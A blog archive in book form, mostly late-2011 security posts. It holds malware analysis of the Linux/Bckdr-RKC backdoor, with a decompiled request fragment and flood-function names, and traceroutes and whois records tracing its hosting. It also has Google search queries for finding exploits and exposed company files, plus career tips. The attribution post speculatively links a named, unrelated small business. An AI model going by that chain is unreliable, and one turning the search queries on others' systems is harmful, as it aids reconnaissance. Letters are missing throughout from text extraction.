1. http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Linux%7EBckdr-RKC/ detailed-analysis.aspx 2. http://pastebin.com/RZAnDnkz 3. http://md5.virscan.org/58c23ca549c941f0d44b35fa31d77011 4. http://caffinesecurity-blogspot.tradepub.com/free/w_aaaa1364/?p=w_aaaa1364
1.4.13
Protect Your Family While Using Social Media (2011-12-22 19:57)
Cyberbullying and sexual predators are an ever increasing threat online, especially with social media sites like Facebook. See how to protect your children with this great informational video! [EMBED] [1]Protect your child from cyberbullies and strangers with ZoneAlarm SocialGuard
1. http://www.tkqlhce.com/8g104js0ys-FLLKILKKFHGOPHGNJ
1.4.14
Linux/Bckdr-RKC: A New Variant Appears (2011-12-26 10:18)
Someone was busy this Christmas. A new variant of Linux/Bckdr-RKC has been placed on my honeypot. Unfortunately detections by Sophos do not detect this variant, so Ive sent it back to them for analysis. I have posted the [1]strings from the unpacked malware, as well as a [2]di between the strings of the old version and new version. I will post updates as I can.
1. http://pastebin.com/0hqYbT8m 2. http://pastebin.com/ePdRxsT4
1.4.15
Woman Gives Birth to Three Plates (2011-12-27 12:59)
Just saw this email in the funsec mailing list:
Hello, My name is Mrs Yetunde Owolabi from Republic of Benin, I gave birth to three plates, 3 children at a time after the death my husband on 18th of June 2011 by auto car accident. Already we have received 5 children from God, right now I cant take care of them so I have decided to give them out for adoption, if you are interested let me know, I am not selling them but you will only pay for adoption fees to the ministry in concern and the Lawyer will legalized all the relevant documents and the baby will become legally yours. Thanks, Mrs. Yetunde Owolabi 46
1.4. December
BlogBook
You read that right. She gave birth to 3 plates. I really wish I had her email address, as I would be very impressed if she could provide some pictures of these plates.
1.4.16
How to Get a Cyber Security or Information Assurance Job (2011-12-27 19:37)
So, youve decided you want to start working in the security eld? Where do you start? First, develop a plan and some career goals. Do you want to just be a tech all your life, or do you want to eventually become a manager? What interests you? Do you want to know how to protect networks and computers, or do you want to analyze malware and perform penetration testing? There are many paths available to you. This is a brief guide on what to do and how to get the job you want. Realize that Rome wasnt built in a day, and that your dream job isnt going to happen overnight. Computer security is truly a thankless job. You will constantly be harassed and insulted by non-security folks for making their lives more dicult. After all, no one would ever guess that their password is their middle name, right? Why are you making them include numbers AND special characters? Do you know how hard that is to remember? If you havent been scared away yet, lets look at how to get started. Get a Degree It really helps to have a college degree. But it doesnt have to be in Information Assurance or Cyber Security! Other degrees which are useful:
Computer Science Computer Engineering Information Technology (insert other wide-spectrum computer degree here) You can start with just an Associates degree, or go for your Bachelors. A Bachelors degree will qualify you for more jobs and earn higher pay, but will cost more time and money. Note that you *can* substitute experience for a degree in some cases, but unfortunately this is rather dicult to do unless youre already well established within your eld (and you wouldnt need to be reading this guide anyway). Get a Haircut, and Get a Real Job Now its time to get a tech job. For starters, this doesnt have to be security related, because technically all tech jobs are security related. For example, I started o as a software tester. One of the functions of my job, besides making sure the software worked, was to make sure the software was secure. However, be warned that the job you get may help to dene your entire career path. A few examples:
System Administrator, Software Tester, or IT Help Desk most likely career path will transition to security compliance and analysis technical sta and management Web Developer, Software Developer, or Database Developer most likely career path will transition to malware analysis technical sta and management
47
BlogBook
1.4. December
Any of the above positions could possibly transition to penetration testing or computer forensics technical sta and management Its not impossible to change career paths mid-steam, but its not going to be easy. Here are some relevant [1]resume and interview tips. Get Certied! Its very important to become certied in your eld of expertise if you want to advance your career. Some positions, especially Government contracting positions, will require certications within 6 months of obtaining the position. If youre interested in the specic requirements for Government contracting, take a look at the [2]DoD 8570.01-M Information Assurance Workforce Improvement Program. Security+ Certication A good starter is the CompTIA Security+ certication. This certication shows employers that you have a basic understanding of important security concepts. The 90 minute exam is designed to be taken by someone with two years basic computing and networking experience. But dont be fooled, it can be tricky. Here are two study guides which can help:
[3]SY0-201 CompTIA Security+ Practice Exam and Study Guide [4]SY0-301 CompTIA Security+ Practice Exams If your networking skills are a little lacking, this guide may also help:
[5]Quick and Dirty Subnetting Cisco CCNP Certication If networking is one of your stronger skills, you should also consider obtaining a Cisco Certied Network Professional certication. This certication shows employers that you have in-depth knowledge for conguring and maintaining network equipment such as switches and routers. Here is a Cisco CCNP Practice Exam to help you out:
[6]Cisco CCNP 642-813 (SWITCH) Practice Exam CISSP Certication The CISSP certication is considered the best certication for Cyber Security or Information Assurance professionals to obtain. This dicult exam is best described as a mile wide and an inch deep, covering a broad range of topics without becoming too technical. While this certication is aimed at management types, its denitely useful for techs as well. Once again, here is a practice exam for your use:
[7]ISC2 CISSP Practice Exam 48

1.4. December Conclusion
BlogBook
I hope this quick guide has been useful. If you have any pointers or questions, please feel free to add comments below!
1. http://caffinesecurity-blogspot.tradepub.com/category/career-professional-development-interviews/590/ 2. http://www.dtic.mil/whs/directives/corres/pdf/857001m.pdf 3. http://caffinesecurity-blogspot.tradepub.com/free/w_exam03/?p=w_exam03 4. http://caffinesecurity-blogspot.tradepub.com/free/w_exam18/?p=w_exam18 5. http://caffinesecurity-blogspot.tradepub.com/free/w_prep07/?p=w_prep07 6. http://caffinesecurity-blogspot.tradepub.com/free-offer/ cisco-ccnp-642-813-switch-special-edition-practice-exams/w_exam15?sr=hicat&_t=hicat:587 7. http://caffinesecurity-blogspot.tradepub.com/free-offer/isc2-cissp/w_exam12?sr=hicat&_t=hicat:587
1.4.17
[EMBED]
Anonymous: Friend or Foe? (2011-12-27 22:59)
Is Anonymous a force for good, or just another threat online? This video has been posted in response to the [1]Stratfor hacking incident.
1. aspx http://www.identityfinder.com/blog/post/ Identity-Finder-Releases-Detailed-Analysis-of-Personal-Information-e28098Anonymouse28099-Attack-on-Stratfor.
1.4.18
Protect Insider Data By Googling First, Often (2011-12-28 10:39)
Dark Reading has an excellent article called [1]Protect Insider Data By Googling First, Often. The summary of the article states:
Sensitive company data is often leaked via Google, Bing, and other search engines nd it before the bad guys can Sound advice, and excellent example of why its important to setup [2]Google Alerts to monitor for privacy breaches, as I described in a [3]previous post.
1. http://www.darkreading.com/insider-threat/167801100/security/security-management/232301074/ protect-insider-data-by-googling-first-often.html 2. http://caffeinesecurity.blogspot.com/2011/12/misuse-of-your-personal-information-and.html 3. http://caffeinesecurity.blogspot.com/2011/12/misuse-of-your-personal-information-and.html
1.4.19
Chinese Origins in .ssyslog Decompiled - Linux/Bckdr-RKC and Hutizu

(2011-12-30 22:33)
I have partially decompiled the second piece of malware which was similar to the original Linux/Bckdr-RKC dropped on my honeypot. Update: .ssyslog is now detected as Hutizu. I am [1]publicly posting the rst section of this le to highlight my ndings so far... Update: The full decompiled source of both pieces of malware is now available at [2]Google Code
49
BlogBook
1.4. December
The rst part of this decompiled code which really stood out was a clear marker that this malware is denately of Chinese origin. This snippet of code is from the following function
int autoupdate(char* url address, char* local to le) Code:
L0805FF50( & v3660, GET / %s HTTP/1.1 \nAccept: */* \nAccept-Language: zh-cn \nUser-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) \nHost: %s: %d \nConnection: Close \n \n, & v2380); The Accept-Language of zh-cn represents [3]Traditional Chinese as the desired web browse language. This means the malware in question was most likely programmed by a native speaker of Chinese. Add to this the fact that the malware is hosted by a fake corporation in China, and that the previous version of this malware also phoned home to the same fake corporation, this all becomes very interesting. Here are a few other function names from this latest version:
copy myself(const char* name) autostart(const char* inser to le) int SendSevMonitor() int SendServerPack() GetNetPackets(long long unsigned int* lNetOut, long long unsigned int* lPacketOut) int moniter(char* host) int udpood( Unknown base* ThreadData) int synood( Unknown base* ThreadData) int synbigpacket( Unknown base* ThreadData) int ackood( Unknown base* ThreadData) int ackbigpacket( Unknown base* ThreadData) GetStructureDnsPacket(char* QueryDomain, char* QueryData, int* nQueryData) int dnsood( Unknown base* ThreadData) int more ip dns test( Unknown base* ThreadData) int autoupdate(char* url address, char* local to le) 50
1.4. December int get online ip(char* domain, char* return ip) int parse dns response(char* return ip) parse dns name(unsigned char* chunk, unsigned char* ptr, char* out, int* len) send dns request(const char* dns name) connect to server()
BlogBook
Make no mistake, this malware is clearly designed to perform reconnaissance on internal networks and disrupt communications when instructed to do so by the command and control server. The malware has self-replication and automatic update capabilities. I nd this malware very disturbing. What I nd even more distrubing is the fact that since my submission of this malware to antivirus vendors, with the exception of Avira who believes this le is clean, none of the antivirus vendors have completed their analysis. These two pieces of malware seem very professionally crafted with a clear purpose - to serve as a cyber weapon.
1. http://pastebin.com/Tenmhmnf 2. http://code.google.com/p/caffsec-malware-analysis/source/browse/trunk/ssyslog/ 3. http://social.msdn.microsoft.com/Forums/en/netfxbcl/thread/4fe22069-6556-4ce5-a264-edb59d102c85
1.4.20
Following
the
Trail:
Determining
the
Origins
of
Linux/Bckdr-RKC
(2011-12-31 12:10)
It is already known that the two Linux/Bckdr-RKC variants I have received have both been hosted by 216.83.44.229. Furthermore, the rst variant had a phone-home address of 216.83.44.226. Both of these IP addresses are registered to the netblock owned by WIRELESS-ALARM.COM (not to be confused with the actual website wireless-alarm.com, which is registered to a dierent contact completely, and unrelated here). Lets use what we already know to try to nd the organization responsible for this malware. Here is a traceroute I performed several days ago: Hop(ms)(ms)(ms) 1 0 0 0 IP Address Host name 206.123.64.154 [1]jbdr2.0.dal.colo4.com
2 0 0 0 64.124.196.225 [2]xe-4-2-0.er2.dfw2.us.above.net 3 0 Timed out 0 63.218.23.29 [3]ge5-4.br02.dal01.pccwbtn.net 4 214 214 214 63.218.252.86 [4]ge939.br03.hkg04.pccwbtn.net 5 214 214 258 112.121.160.221 - 6 213 213 213 112.121.160.18 - 7 218 218 217 112.121.160.198 - 8 213 213 212 216.83.44.226 And here is a traceroute as performed today: TraceRoute to 216.83.44.226 Hop(ms)(ms)(ms) 1 12 0 0 IP AddressHost name 206.123.64.154 jbdr2.0.dal.colo4.com
51
BlogBook
1.4. December
2 0 0 0 64.124.196.225 xe-4-2-0.er2.dfw2.us.above.net 3 0 0 0 63.218.23.29 ge5-4.br02.dal01.pccwbtn.net 4 212 212 212 63.218.252.86 ge9-39.br03.hkg04.pccwbtn.net 5 Timed out Timed out Timed out - 6 Timed out Timed out Timed out - 7 Timed out Timed out Timed out - 8 Timed out Timed out Timed out Seems that either the responsible organization has been disconnected from the network by their provider, or they have purposely disconnected themselves to hinder analysis. Starting with 216.83.44.226 and working backwards, lets see who this section of IP addresses is registered to. 216.83.44.0 - 216.83.44.255 is registered to WIRELESS-ALARM.COM OrgName: WIRELESS-ALARM.COM OrgId: WIREL-46 Address: 3026 Ensley 5 Points W Avenue City: Birmingham StateProv: AL PostalCode: 35208 Country: US RegDate: 2009-12-30 Updated: 2011-09-24 Ref: http://whois.arin.net/rest/org/WIREL-46 OrgAbuseHandle: PQU12-ARIN OrgAbuseName: Quagliano, Pedro OrgAbusePhone: +1-877-605-5273 OrgAbuseEmail: pedroquagliano@cyanclouds.com We already know that this is a fake registration, because all of my emails to pedroquagliano@cyanclouds.com were returned as non-deliverable due to DNS failures. That means cyanclouds.com is not an active domain. Lets go up a level in IP address ownership. 216.83.32.0 - 216.83.63.255 is owned by Ether.Net LLC. network:Class-Name:network network:ID:216.83.32.0/20 network:Auth-Area:216.83.32.0/20 network:Network-Name:ETHRN-216-83-46-0 network:IP-Network:216.83.46.0/24 network:IP-Network-Block:216.83.46.0 - 216.83.46.255 network:Org-Name:InfoMove Hong Kong Limited. network:Street-Address:Unit 2001, 20/F, New Tech Plaza, 8 Tai Yau Street network:City:San Po Kong network:State:HK network:Country-Code:HK Ether.NET appears to be a legitimate business operating in Hong Kong. They have been around for many years. They have an AIM for support which I was able to trace back to 2003 posting on web hosting support forums. Doubtful that theyre involved, so lets shift out focus elsewhere. Going back to the IP range owned by WIRELESS-ALARM.COM, 216.83.44.0 - 216.83.44.255, lets look at what else is hosted there. From [5]http://bgp.he.net/net/216.83.44.0/24 # dns as of 12/31/2011 6:21 PST IPPTRA [6]216.83.44.31 [7]mail.bostonyarn.com [8]216.83.44.54 [9]fold.bronxbreakfast.com [10]216.83.44.113 [11]prn.iselinnotebook.com [12]216.83.44.115 [13]joplinyear.com [14]216.83.44.116 [15]mail.joplinyear.com [16]216.83.44.189 [17]proe.northandoverschool.com [18]216.83.44.191 [19]northbendlearning.com [20]216.83.44.202 [21]wink.norwellobservation.com 52
1.4. December
BlogBook
[22]216.83.44.204 [23]mail.philadelphiafather.com [24]e8lvbet.com, [25]i3mic.com [26]216.83.44.221 [27]copy.southplaineldfeet.com [28]216.83.44.2 [29]ns1.cyanclouds.com [30]216.83.44.3 [31]ns2.cyanclouds.com [32]216.83.44.10 [33]22073.com [34]216.83.44.18 [35]int-pe.com, [36]interush-pe.com [37]216.83.44.19 [38]oll365.com [39]216.83.44.42 [40]centrinofund.com, [41]cf-pe.com [42]216.83.44.44 [43]games456.us, [44]gamt465.com, [45]gmae456.info [46]216.83.44.45 [47]com-com-com-com-com.com [48]216.83.44.46 [49]111i.net, [50]23u9.com, [51]55-com.com, [52]gamex6.com, [53]llgame.net, [54]org2.net [55]216.83.44.66 [56]bmp79.com [57]216.83.44.67 [58]app67.com, [59]apt67.com, [60]bbv78.com, [61]bul79.com, [62]ddc77.com, [63]ght33.com, [64]jjt55.com, [65]jpg77.com, [66]kky55.com, [67]mmx88.com, [68]rtr66.com, [69]sta78.com, [70]tgg33.com, [71]uub33.com, [72]vbo33.com, [73]vvx45.com [74]216.83.44.68 [75]aaz33.com, [76]ccx89.com, [77]ygk77.com [78]216.83.44.69 [79]abo34.com, [80]bmn99.com, [81]ccx66.com, [82]ese55.com, [83]s234.com, [84]jsa52.com, [85]kbx33.com, [86]kut99.com, [87]kyy78.com, [88]myb78.com, [89]nnc99.com, [90]rka77.com, [91]ssx69.com, [92]ttx77.com, [93]tvn66.com, [94]wsd22.com [95]216.83.44.70 [96]kgb69.com [97]216.83.44.82 [98]66hw.net, [99]hk888.net [100]216.83.44.90 [101]clubwptasia.com, [102]haedongcheong.com, [103]oce365.com, [104]openrace24.com [105]216.83.44.99 [106]ylg886.com [107]216.83.44.122 [108]hg1138.com [109]216.83.44.123 [110]fh636.com, [111]hg3968.com, [112]hk638.com, [113]yh372.com [114]216.83.44.131 [115]hg0608.com, [116]hg1918.com, [117]hg4568.com, [118]hg9168.com, [119]hg9338.com [120]216.83.44.132 [121]hg7678.com [122]216.83.44.154 [123]sc93.com [124]216.83.44.155 [125]tv105.com [126]216.83.44.156 [127]duooo.com [128]216.83.44.157 [129]bbsveb.com [130]216.83.44.163 [131]1999829.com, [132]3771mm.info, [133]911meinv.info, [134]mytaojia.com, [135]qgxinxi.info, [136]taaobbao.com, [137]wawachina.info, [138]yayaqq.info [139]216.83.44.164 [140]360meinv.info, [141]920meinv.com, [142]999taobao.com, [143]kissbye.info, [144]tabaserver.com [145]216.83.44.165 [146]265gc.com [147]216.83.44.166 [148]439995.com [149]216.83.44.186 [150]03hz.com, [151]18018.com [152]216.83.44.194 [153]ckk67.com, [154]fta79.com, [155]jkj88.com, [156]ktm77.com, [157]ktm99.com, [158]mou79.com, [159]nvb89.com, [160]pub79.com, [161]ssr999.com, [162]ssx778.com, [163]tot66.com, [164]tut88.com, [165]utp79.com, [166]vub99.com, [167]xxr44.com, [168]yyc33.com [169]216.83.44.195 [170]aki77.com, [171]amu77.com, [172]arp77.com, [173]arv99.com, [174]avc77.com, [175]eed69.com, [176]gje88.com, [177]mmb77.com, [178]mpo77.com, [179]tup77.com, [180]vcd79.com [181]216.83.44.197 [182]vvz69.com [183]216.83.44.218 [184]hg0035.com, [185]hg1090.com [186]216.83.44.219 [187]hg1095.com, [188]hg8869.com [189]216.83.44.228 [190]lcddos.com [191]216.83.44.229 [192]todayg.com, [193]xy100000.com [194]216.83.44.243 [195]hg0091.com, [196]hg0093.com, [197]hg0094.com [198]216.83.44.245
53
BlogBook
1.4. December
[199]hg0092.com [200]216.83.44.250 [201]tt95588.com Hmm, remember the registration for WIRELESS-ALARM.COM? The email address pointed at cyancoulds.com... and the DNS servers for cyanclouds.com happen to be hosted in the same netblock. Could it be cyanclouds.com is also being controlled by the responsible organization? So lets lookup the contact info for cyanclouds.com... Domain Name: CYANCLOUDS.COM Registrar: DIRECTNIC, LTD Whois Server: whois.directnic.com Referral URL: http://www.directnic.com Name Server: NS1.CYANCLOUDS.COM Name Server: NS2.CYANCLOUDS.COM Status: clientDeleteProhibited Status: clientTransferProhibited Status: clientUpdateProhibited Updated Date: 31-jan-2011 Creation Date: 03-mar-2009 Expiration Date: 03-mar-2012 Registrant: Good Names Network 342 Broadway New York, NY 10013 US 212-555-1212 Domain Name: CYANCLOUDS.COM Administrative Contact: Operations, Network goodnames@yahoo.com 342 Broadway New York, NY 10013 US 212-555-1212 Technical Contact: Operations, Network goodnames@yahoo.com 342 Broadway New York, NY 10013 US 212-555-1212 It looks like cyanclouds.com is registered by proxy through another company called the Good Names Network. But wait...is this company real either? 212-555-1212 will simply give you [202]directory assistance for the 212 area code. (New York) 342 Broadway is actually a [203]UPS Store which oers mailbox services...so this could be anyone. So, another dead end? This malware which has denite Chinese origins also has a link to an anonymous business New York. This is where Id like to point out the marvels of Google. Specically Google Street View. Without Google Street View, we would never have known that next to this UPS Store at 344 Broadway is a shop called Broadway Cleaners. A quick Google search shows that Broadway Cleaners is actually owned by someone at [204]95 Worth Street, which happens to be in [205]Chinatown. Please note that this is absolutely speculation, and that there is no proof whatsoever anyone at Broadway Cleaners has anything to do with this. However, the fact that the malware has denite ties to China, and the fact that the proxy company used to register WIRELESS-ALARM.COMs IP block is right next door to 54
1.4. December
BlogBook
a business originating in Chinatown, is a very interesting coincidence. Unfortunately this is where the trail goes cold. This search for the origin of this malware has possibly raised more questions than provided answers. But one thing is for certain - the network framework for this malware has denitely been in place for some time. WIRELESS-ALARM.COMs IP block as well as cyanclouds.com have been registered since 2009. This is not the work of a y-by-night script kiddy. Careful planning has been taken to not only develop this malware, but also to establish the hosting this malware would be using - and hide its true origins.
1. http://jbdr2.0.dal.colo4.com/ 2. http://xe-4-2-0.er2.dfw2.us.above.net/ 3. http://ge5-4.br02.dal01.pccwbtn.net/ 4. http://ge9-39.br03.hkg04.pccwbtn.net/ 5. http://bgp.he.net/net/216.83.44.0/24#_dns 6. http://bgp.he.net/ip/216.83.44.31 7. http://bgp.he.net/dns/mail.bostonyarn.com 8. http://bgp.he.net/ip/216.83.44.54 9. http://bgp.he.net/dns/fold.bronxbreakfast.com 10. http://bgp.he.net/ip/216.83.44.113 11. http://bgp.he.net/dns/prn.iselinnotebook.com 12. http://bgp.he.net/ip/216.83.44.115 13. http://bgp.he.net/dns/joplinyear.com 14. http://bgp.he.net/ip/216.83.44.116 15. http://bgp.he.net/dns/mail.joplinyear.com 16. http://bgp.he.net/ip/216.83.44.189 17. http://bgp.he.net/dns/proe.northandoverschool.com 18. http://bgp.he.net/ip/216.83.44.191 19. http://bgp.he.net/dns/northbendlearning.com 20. http://bgp.he.net/ip/216.83.44.202 21. http://bgp.he.net/dns/wink.norwellobservation.com 22. http://bgp.he.net/ip/216.83.44.204 23. http://bgp.he.net/dns/mail.philadelphiafather.com 24. http://bgp.he.net/dns/e8lvbet.com 25. http://bgp.he.net/dns/i3mic.com 26. http://bgp.he.net/ip/216.83.44.221 27. http://bgp.he.net/dns/copy.southplainfieldfeet.com 28. http://bgp.he.net/ip/216.83.44.2 29. http://bgp.he.net/dns/ns1.cyanclouds.com 30. http://bgp.he.net/ip/216.83.44.3 31. http://bgp.he.net/dns/ns2.cyanclouds.com 32. http://bgp.he.net/ip/216.83.44.10 33. http://bgp.he.net/dns/22073.com 34. http://bgp.he.net/ip/216.83.44.18 35. http://bgp.he.net/dns/int-pe.com 36. http://bgp.he.net/dns/interush-pe.com 37. http://bgp.he.net/ip/216.83.44.19 38. http://bgp.he.net/dns/oll365.com 39. http://bgp.he.net/ip/216.83.44.42 40. http://bgp.he.net/dns/centrinofund.com 41. http://bgp.he.net/dns/cf-pe.com 42. http://bgp.he.net/ip/216.83.44.44
55
BlogBook
43. http://bgp.he.net/dns/games456.us 44. http://bgp.he.net/dns/gamt465.com 45. http://bgp.he.net/dns/gmae456.info 46. http://bgp.he.net/ip/216.83.44.45 47. http://bgp.he.net/dns/com-com-com-com-com.com 48. http://bgp.he.net/ip/216.83.44.46 49. http://bgp.he.net/dns/111i.net 50. http://bgp.he.net/dns/23u9.com 51. http://bgp.he.net/dns/55-com.com 52. http://bgp.he.net/dns/gamex6.com 53. http://bgp.he.net/dns/llgame.net 54. http://bgp.he.net/dns/org2.net 55. http://bgp.he.net/ip/216.83.44.66 56. http://bgp.he.net/dns/bmp79.com 57. http://bgp.he.net/ip/216.83.44.67 58. http://bgp.he.net/dns/app67.com 59. http://bgp.he.net/dns/apt67.com 60. http://bgp.he.net/dns/bbv78.com 61. http://bgp.he.net/dns/bul79.com 62. http://bgp.he.net/dns/ddc77.com 63. http://bgp.he.net/dns/ght33.com 64. http://bgp.he.net/dns/jjt55.com 65. http://bgp.he.net/dns/jpg77.com 66. http://bgp.he.net/dns/kky55.com 67. http://bgp.he.net/dns/mmx88.com 68. http://bgp.he.net/dns/rtr66.com 69. http://bgp.he.net/dns/sta78.com 70. http://bgp.he.net/dns/tgg33.com 71. http://bgp.he.net/dns/uub33.com 72. http://bgp.he.net/dns/vbo33.com 73. http://bgp.he.net/dns/vvx45.com 74. http://bgp.he.net/ip/216.83.44.68 75. http://bgp.he.net/dns/aaz33.com 76. http://bgp.he.net/dns/ccx89.com 77. http://bgp.he.net/dns/ygk77.com 78. http://bgp.he.net/ip/216.83.44.69 79. http://bgp.he.net/dns/abo34.com 80. http://bgp.he.net/dns/bmn99.com 81. http://bgp.he.net/dns/ccx66.com 82. http://bgp.he.net/dns/ese55.com 83. http://bgp.he.net/dns/ffs234.com 84. http://bgp.he.net/dns/jsa52.com 85. http://bgp.he.net/dns/kbx33.com 86. http://bgp.he.net/dns/kut99.com 87. http://bgp.he.net/dns/kyy78.com 88. http://bgp.he.net/dns/myb78.com 89. http://bgp.he.net/dns/nnc99.com 90. http://bgp.he.net/dns/rka77.com 91. http://bgp.he.net/dns/ssx69.com 92. http://bgp.he.net/dns/ttx77.com
1.4. December
56
1.4. December
93. http://bgp.he.net/dns/tvn66.com 94. http://bgp.he.net/dns/wsd22.com 95. http://bgp.he.net/ip/216.83.44.70 96. http://bgp.he.net/dns/kgb69.com 97. http://bgp.he.net/ip/216.83.44.82 98. http://bgp.he.net/dns/66hw.net 99. http://bgp.he.net/dns/hk888.net 100. http://bgp.he.net/ip/216.83.44.90 101. http://bgp.he.net/dns/clubwptasia.com 102. http://bgp.he.net/dns/haedongcheong.com 103. http://bgp.he.net/dns/oce365.com 104. http://bgp.he.net/dns/openrace24.com 105. http://bgp.he.net/ip/216.83.44.99 106. http://bgp.he.net/dns/ylg886.com 107. http://bgp.he.net/ip/216.83.44.122 108. http://bgp.he.net/dns/hg1138.com 109. http://bgp.he.net/ip/216.83.44.123 110. http://bgp.he.net/dns/fh636.com 111. http://bgp.he.net/dns/hg3968.com 112. http://bgp.he.net/dns/hk638.com 113. http://bgp.he.net/dns/yh372.com 114. http://bgp.he.net/ip/216.83.44.131 115. http://bgp.he.net/dns/hg0608.com 116. http://bgp.he.net/dns/hg1918.com 117. http://bgp.he.net/dns/hg4568.com 118. http://bgp.he.net/dns/hg9168.com 119. http://bgp.he.net/dns/hg9338.com 120. http://bgp.he.net/ip/216.83.44.132 121. http://bgp.he.net/dns/hg7678.com 122. http://bgp.he.net/ip/216.83.44.154 123. http://bgp.he.net/dns/sc93.com 124. http://bgp.he.net/ip/216.83.44.155 125. http://bgp.he.net/dns/tv105.com 126. http://bgp.he.net/ip/216.83.44.156 127. http://bgp.he.net/dns/duooo.com 128. http://bgp.he.net/ip/216.83.44.157 129. http://bgp.he.net/dns/bbsveb.com 130. http://bgp.he.net/ip/216.83.44.163 131. http://bgp.he.net/dns/1999829.com 132. http://bgp.he.net/dns/3771mm.info 133. http://bgp.he.net/dns/911meinv.info 134. http://bgp.he.net/dns/mytaojia.com 135. http://bgp.he.net/dns/qgxinxi.info 136. http://bgp.he.net/dns/taaobbao.com 137. http://bgp.he.net/dns/wawachina.info 138. http://bgp.he.net/dns/yayaqq.info 139. http://bgp.he.net/ip/216.83.44.164 140. http://bgp.he.net/dns/360meinv.info 141. http://bgp.he.net/dns/920meinv.com 142. http://bgp.he.net/dns/999taobao.com
BlogBook
57
BlogBook
143. http://bgp.he.net/dns/kissbye.info 144. http://bgp.he.net/dns/tabaserver.com 145. http://bgp.he.net/ip/216.83.44.165 146. http://bgp.he.net/dns/265gc.com 147. http://bgp.he.net/ip/216.83.44.166 148. http://bgp.he.net/dns/439995.com 149. http://bgp.he.net/ip/216.83.44.186 150. http://bgp.he.net/dns/03hz.com 151. http://bgp.he.net/dns/18018.com 152. http://bgp.he.net/ip/216.83.44.194 153. http://bgp.he.net/dns/ckk67.com 154. http://bgp.he.net/dns/fta79.com 155. http://bgp.he.net/dns/jkj88.com 156. http://bgp.he.net/dns/ktm77.com 157. http://bgp.he.net/dns/ktm99.com 158. http://bgp.he.net/dns/mou79.com 159. http://bgp.he.net/dns/nvb89.com 160. http://bgp.he.net/dns/pub79.com 161. http://bgp.he.net/dns/ssr999.com 162. http://bgp.he.net/dns/ssx778.com 163. http://bgp.he.net/dns/tot66.com 164. http://bgp.he.net/dns/tut88.com 165. http://bgp.he.net/dns/utp79.com 166. http://bgp.he.net/dns/vub99.com 167. http://bgp.he.net/dns/xxr44.com 168. http://bgp.he.net/dns/yyc33.com 169. http://bgp.he.net/ip/216.83.44.195 170. http://bgp.he.net/dns/aki77.com 171. http://bgp.he.net/dns/amu77.com 172. http://bgp.he.net/dns/arp77.com 173. http://bgp.he.net/dns/arv99.com 174. http://bgp.he.net/dns/avc77.com 175. http://bgp.he.net/dns/eed69.com 176. http://bgp.he.net/dns/gje88.com 177. http://bgp.he.net/dns/mmb77.com 178. http://bgp.he.net/dns/mpo77.com 179. http://bgp.he.net/dns/tup77.com 180. http://bgp.he.net/dns/vcd79.com 181. http://bgp.he.net/ip/216.83.44.197 182. http://bgp.he.net/dns/vvz69.com 183. http://bgp.he.net/ip/216.83.44.218 184. http://bgp.he.net/dns/hg0035.com 185. http://bgp.he.net/dns/hg1090.com 186. http://bgp.he.net/ip/216.83.44.219 187. http://bgp.he.net/dns/hg1095.com 188. http://bgp.he.net/dns/hg8869.com 189. http://bgp.he.net/ip/216.83.44.228 190. http://bgp.he.net/dns/lcddos.com 191. http://bgp.he.net/ip/216.83.44.229 192. http://bgp.he.net/dns/todayg.com
1.4. December
58
1.4. December
193. http://bgp.he.net/dns/xy100000.com 194. http://bgp.he.net/ip/216.83.44.243 195. http://bgp.he.net/dns/hg0091.com 196. http://bgp.he.net/dns/hg0093.com 197. http://bgp.he.net/dns/hg0094.com 198. http://bgp.he.net/ip/216.83.44.245 199. http://bgp.he.net/dns/hg0092.com 200. http://bgp.he.net/ip/216.83.44.250 201. http://bgp.he.net/dns/tt95588.com 202. http://en.wikipedia.org/wiki/555_%28telephone_number%29#Real_uses_of_555_numbers 203. http://www.theupsstorelocal.com/5308/ 204. http://localdirectory.nydailynews.com/344+broadway+cleaners.9.7416489p.home.html 205. http://www.google.com/search?q=95+Worth+St+chinatown
BlogBook
59
BlogBook
1.4. December
60
Chapter 2
2012
2.1
2.1.1
January
Malware Analysis Lab - New Feature! (2012-01-04 18:26)
Im happy to announce that I have created a Google code project called the [1]Caeine Security Malware Analysis Lab. At this project, you will be able to see my current research into unknown malware on my honeypot, and even contribute to my research! I have uploaded source code for xsyslog and ssyslog, which can be accessed through the source code svn repository. [2]Checkout the project now!
1. http://code.google.com/p/caffsec-malware-analysis/ 2. http://code.google.com/p/caffsec-malware-analysis/
2.1.2
Monitoring for New Zero Day Exploits through Google Alerts (2012-01-06 19:08)
In case you havent read it, I previously posted a how-to for using Google Alerts to monitor for misuse of your personal information... [1]Misuse of Your Personal Information and Google Alerts Today Im going to expand on that post, and show how advanced Google search strings can be used to monitor for other things, such as when new zero day exploits are posted publicly to Pastebin. For those not familiar with it, Pastebin is a large site which allows anyone to post large amounts of text. One of the common uses for this site is the public disclosure of new vulnerabilities and exploits. To leverage some of the more powerful features of Google, use advanced search syntax to narrow your search. An excellent quick reference is available at [2]Google Guide. Using our previous method to create an As it happens alert, lets try writing a custom query which monitors for new exploits...
intext:exploit OR intext:vulnerability OR intext:zero day OR intext:0day site:pastebin.com Further tweaking will allow you to target a specic software or manufacturer, such as...
61
BlogBook
2.1. January
intext:microsoft intext:exploit OR intext:vulnerability OR intext:zero day OR intext:0day site:pastebin.com I have provided an example RSS feed for a wide zero day search [3]here. Of course, this wont give you up-to-the-minute searching of Pastebin, but its better than not monitoring at all.
1. http://caffeinesecurity.blogspot.com/2011/12/misuse-of-your-personal-information-and.html 2. http://www.googleguide.com/advanced_operators_reference.html 3. http://www.google.com/alerts/feeds/05108430098638908165/1562501272906263633
2.1.3
Monitoring
for
Leaked
Company
Documents
through
Google
Alerts
(2012-01-17 14:57)
This article is part of a series on using Google Alerts to protect you, your family, and your company through early notication of data breaches and leaks. Previous Articles: [1]Misuse of Your Personal Information and Google Alerts [2]Monitoring for New Zero Day Exploits through Google Alerts If youre following good security practices, all of your internal company documents are properly labeled with important labels such as Company Proprietary, Company Sensitive or Do Not Distribute. In fact your company has probably established a standardized header for use on all sensitive documents. So, whens the last time you performed a Google search for this header? Whens the last time you searched to see what documents are being exposed to the web hosted on your domain? The results might surprise you. The [3]Google Hacking Database has some excellent information on how to use Google to nd sensitive les. Its very easy to use some of the search queries there, add your company name or standard header, and see what happens. In fact, even if you nd no results, it would be a great idea to setup Google Alerts to monitor for documents posted (accidentally or otherwise) which appear to be internal company documents. Heres an example, which should produce results for (hopefully!) intentionally posted documents: site:blogspot.com letype:doc OR letype:xls OR letype:pdf The above query will return common oce 